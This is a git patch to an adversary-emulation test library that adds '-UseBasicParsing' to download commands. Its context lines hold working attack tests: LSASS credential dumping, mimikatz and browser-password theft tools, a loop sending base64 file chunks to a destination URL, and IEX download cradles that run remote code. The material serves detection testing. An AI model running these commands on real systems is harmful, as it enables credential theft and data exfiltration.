From cb5b02d3a542ac10a6a75ae5022a455bfbcf46e2 Mon Sep 17 00:00:00 2001 From: Hare Sudhan Date: Sat, 13 Dec 2025 17:23:17 -0500 Subject: [PATCH] add -UseBasicParsing --- atomics/T1003.001/T1003.001.yaml | 14 +++++------ atomics/T1030/T1030.yaml | 2 +- atomics/T1036/T1036.yaml | 2 +- .../T1059.001/src/Invoke-DownloadCradle.ps1 | 2 +- atomics/T1072/T1072.yaml | 6 ++--- atomics/T1078.003/T1078.003.yaml | 2 +- atomics/T1087.002/T1087.002.yaml | 10 ++++---- atomics/T1090.003/T1090.003.yaml | 6 ++--- atomics/T1127/T1127.yaml | 4 ++-- atomics/T1134.005/T1134.005.yaml | 2 +- atomics/T1546.007/T1546.007.yaml | 2 +- atomics/T1546.010/T1546.010.yaml | 8 +++---- atomics/T1555.003/T1555.003.yaml | 24 +++++++++---------- atomics/T1560.001/T1560.001.yaml | 2 +- atomics/T1562.010/T1562.010.yaml | 2 +- atomics/T1564.006/T1564.006.yaml | 4 ++-- atomics/T1572/T1572.yaml | 2 +- atomics/T1595.003/src/WebServerScan.ps1 | 4 ++-- 18 files changed, 49 insertions(+), 49 deletions(-) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 9a6123c9..4ee322b3 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -30,7 +30,7 @@ atomic_tests: get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" + Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" -UseBasicParsing Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force @@ -81,7 +81,7 @@ atomic_tests: get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path "#{dumpert_exe}") -Force | Out-Null - Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile "#{dumpert_exe}" + Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile "#{dumpert_exe}" -UseBasicParsing executor: command: | "#{dumpert_exe}" @@ -109,7 +109,7 @@ atomic_tests: get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" + Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" -UseBasicParsing executor: command: | PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp" @@ -164,7 +164,7 @@ atomic_tests: [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases" - $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } + $zipUrl = (Invoke-WebRequest $releases -UseBasicParsing | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } $basePath = Split-Path "#{mimikatz_exe}" | Split-Path Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath - description: | @@ -274,7 +274,7 @@ atomic_tests: if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" + Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" -UseBasicParsing Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force @@ -355,7 +355,7 @@ atomic_tests: if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} + Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} -UseBasicParsing executor: command: | #{xordump_exe} -out #{output_file} -x 0x41 @@ -422,7 +422,7 @@ atomic_tests: get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" + Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" -UseBasicParsing executor: command: | PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}" diff --git a/atomics/T1030/T1030.yaml b/atomics/T1030/T1030.yaml index 02989e8d..811252af 100644 --- a/atomics/T1030/T1030.yaml +++ b/atomics/T1030/T1030.yaml @@ -60,6 +60,6 @@ atomic_tests: while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) { $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead) - Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk + Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk -UseBasicParsing } $file.Close() diff --git a/atomics/T1036/T1036.yaml b/atomics/T1036/T1036.yaml index cb285faa..835df0d8 100644 --- a/atomics/T1036/T1036.yaml +++ b/atomics/T1036/T1036.yaml @@ -30,7 +30,7 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest #{url} -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" + Invoke-WebRequest #{url} -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -UseBasicParsing executor: command: |- Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force diff --git a/atomics/T1059.001/src/Invoke-DownloadCradle.ps1 b/atomics/T1059.001/src/Invoke-DownloadCradle.ps1 index 175750fd..ea051455 100755 --- a/atomics/T1059.001/src/Invoke-DownloadCradle.ps1 +++ b/atomics/T1059.001/src/Invoke-DownloadCradle.ps1 @@ -148,7 +148,7 @@ Invoke-DownloadCradle -Type Powershell -Command $Command "Powershell Invoke-WebRequest" If ($PSVersionTable.PSVersion.Major -gt 2){ - $Command = "(`'" + $Url[0] + "`'|ForEach-Object{(IWR (Item Variable:\_).Value)}) | IEX" + $Command = "(`'" + $Url[0] + "`'|ForEach-Object{(IWR (Item Variable:\_).Value -UseBasicParsing)}) | IEX" Invoke-DownloadCradle -Type Powershell -Command $Command } Else{"`tMethod supported on Powershell 3.0 and above only`n"} diff --git a/atomics/T1072/T1072.yaml b/atomics/T1072/T1072.yaml index 67a1870f..92effbb8 100644 --- a/atomics/T1072/T1072.yaml +++ b/atomics/T1072/T1072.yaml @@ -25,7 +25,7 @@ atomic_tests: get_prereq_command: | Write-Host Downloading radmin installer New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}" + Invoke-WebRequest "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}" -UseBasicParsing Write-Host Install Radmin Start-Process msiexec -Wait -ArgumentList /i , "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}", /qn executor: @@ -58,7 +58,7 @@ atomic_tests: get_prereq_command: | Write-Host Downloading PDQ Deploy installer New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://download.pdq.com/release/19/Deploy_19.3.350.0.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}" + Invoke-WebRequest "https://download.pdq.com/release/19/Deploy_19.3.350.0.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}" -UseBasicParsing Write-Host Install PDQ Deploy Start-Process "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}" -Wait -ArgumentList "/s" executor: @@ -81,7 +81,7 @@ atomic_tests: if (Test-Path "${env:ProgramFiles(x86)}\Chocolatey\choco.exe") {exit 0} else {exit 1} get_prereq_command: | Write-Host Downloading Chocolatey installer - Invoke-WebRequest -Uri "https://chocolatey.org/install.ps1" -OutFile "chocolatey-install.ps1" + Invoke-WebRequest -Uri "https://chocolatey.org/install.ps1" -OutFile "chocolatey-install.ps1" -UseBasicParsing Write-Host Installing Chocolatey Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File chocolatey-install.ps1" -Wait executor: diff --git a/atomics/T1078.003/T1078.003.yaml b/atomics/T1078.003/T1078.003.yaml index bb3d9fd6..047cf825 100644 --- a/atomics/T1078.003/T1078.003.yaml +++ b/atomics/T1078.003/T1078.003.yaml @@ -214,7 +214,7 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") { exit 0 } else { exit 1 } get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" -UseBasicParsing Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force executor: diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index 8a246427..b1b88364 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml @@ -60,7 +60,7 @@ atomic_tests: if (Test-Path "#{adrecon_path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile "#{adrecon_path}" + Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile "#{adrecon_path}" -UseBasicParsing executor: command: | Invoke-Expression "#{adrecon_path}" @@ -87,7 +87,7 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null - Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -UseBasicParsing executor: command: | "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties @@ -112,7 +112,7 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null - Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -UseBasicParsing executor: command: | "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args} @@ -137,7 +137,7 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null - Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -UseBasicParsing executor: command: | "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args} @@ -162,7 +162,7 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null - Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -UseBasicParsing executor: command: | "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args} diff --git a/atomics/T1090.003/T1090.003.yaml b/atomics/T1090.003/T1090.003.yaml index f8ff38a0..0801b5bf 100644 --- a/atomics/T1090.003/T1090.003.yaml +++ b/atomics/T1090.003/T1090.003.yaml @@ -28,14 +28,14 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\psiphon3.exe") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\psiphon3.exe" + Invoke-WebRequest "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\psiphon3.exe" -UseBasicParsing - description: | Batch file containing commands to run must be in src directory prereq_command: | if (Test-Path "PathToAtomicsFolder\T1090.003\src\Psiphon.bat") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\T1090.003\src\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat" -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat" -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" -UseBasicParsing executor: name: powershell command: | @@ -65,7 +65,7 @@ atomic_tests: if (Test-Path "#{TorExe}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" + Invoke-WebRequest "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" -UseBasicParsing expand-archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\tor" executor: command: | diff --git a/atomics/T1127/T1127.yaml b/atomics/T1127/T1127.yaml index 533157e5..4d242556 100644 --- a/atomics/T1127/T1127.yaml +++ b/atomics/T1127/T1127.yaml @@ -30,7 +30,7 @@ atomic_tests: if (Test-Path "#{filename}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{filename}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/hello.js" -OutFile "#{filename}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/hello.js" -OutFile "#{filename}" -UseBasicParsing executor: command: | copy "#{filename}" %TEMP%\hello.js @@ -69,7 +69,7 @@ atomic_tests: if (Test-Path "#{filename}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{filename}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/LibHello.js" -OutFile "#{filename}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/LibHello.js" -OutFile "#{filename}" -UseBasicParsing executor: command: | copy "#{filename}" %TEMP%\LibHello.js diff --git a/atomics/T1134.005/T1134.005.yaml b/atomics/T1134.005/T1134.005.yaml index f5603092..258e7799 100644 --- a/atomics/T1134.005/T1134.005.yaml +++ b/atomics/T1134.005/T1134.005.yaml @@ -32,7 +32,7 @@ atomic_tests: New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases" - $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } + $zipUrl = (Invoke-WebRequest $releases -UseBasicParsing | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } $mimikatz_exe = cmd /c echo #{mimikatz_path} $basePath = Split-Path $mimikatz_exe | Split-Path Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath diff --git a/atomics/T1546.007/T1546.007.yaml b/atomics/T1546.007/T1546.007.yaml index ca4a43cb..b0b013bb 100644 --- a/atomics/T1546.007/T1546.007.yaml +++ b/atomics/T1546.007/T1546.007.yaml @@ -24,7 +24,7 @@ atomic_tests: if (Test-Path "#{helper_file}") { exit 0} else { exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{helper_file}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}" -UseBasicParsing executor: command: | netsh.exe add helper "#{helper_file}" diff --git a/atomics/T1546.010/T1546.010.yaml b/atomics/T1546.010/T1546.010.yaml index cc7a25aa..4c340ce6 100644 --- a/atomics/T1546.010/T1546.010.yaml +++ b/atomics/T1546.010/T1546.010.yaml @@ -30,16 +30,16 @@ atomic_tests: get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path "#{registry_file}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile "#{registry_file}" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile "#{registry_file}" -UseBasicParsing + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}" -UseBasicParsing - description: | DLL's must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) prereq_command: | if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll -UseBasicParsing + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll -UseBasicParsing executor: command: | reg.exe import "#{registry_file}" diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index f549e1a9..1a945202 100644 --- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml @@ -25,7 +25,7 @@ atomic_tests: get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" + Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" -UseBasicParsing Expand-Archive "#{file_path}\Modified-SysInternalsSuite.zip" "#{file_path}\sysinternals" -Force Remove-Item "#{file_path}\Modified-SysInternalsSuite.zip" -Force executor: @@ -72,7 +72,7 @@ atomic_tests: if (Test-Path "#{lazagne_path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{lazagne_path}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe" -OutFile "#{lazagne_path}" + Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe" -OutFile "#{lazagne_path}" -UseBasicParsing executor: name: command_prompt elevation_required: true @@ -92,7 +92,7 @@ atomic_tests: get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" - Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi + Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi -UseBasicParsing msiexec /i $installer /qn Start-Process -FilePath "chrome.exe" Stop-Process -Name "chrome" @@ -118,7 +118,7 @@ atomic_tests: get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null $installer = "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe" - Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe" https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe + Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe" https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe -UseBasicParsing Start-Process $installer -ArgumentList '/install /silent /launchopera=1 /setdefaultbrowser=0' Start-Sleep -s 180 Stop-Process -Name "opera" @@ -232,7 +232,7 @@ atomic_tests: if (get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" -erroraction silentlycontinue) {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi" -outfile "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" + Invoke-WebRequest "https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi" -outfile "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" -UseBasicParsing msiexec.exe /i "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" /quiet sleep -s 30 start-process "$env:programfiles\Mozilla Firefox\firefox.exe". @@ -266,7 +266,7 @@ atomic_tests: if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" + Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" -UseBasicParsing - description: | Pycryptodome library must be installed prereq_command: | @@ -408,7 +408,7 @@ atomic_tests: if (Test-Path "#{webbrowserpassview_path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe -OutFile "#{webbrowserpassview_path}" + Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe -OutFile "#{webbrowserpassview_path}" -UseBasicParsing executor: command: | Start-Process "#{webbrowserpassview_path}" @@ -432,7 +432,7 @@ atomic_tests: get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null $installer = "PathToAtomicsFolder\..\ExternalPayloads\FirefoxStubInstaller.exe" - Invoke-WebRequest -OutFile $installer 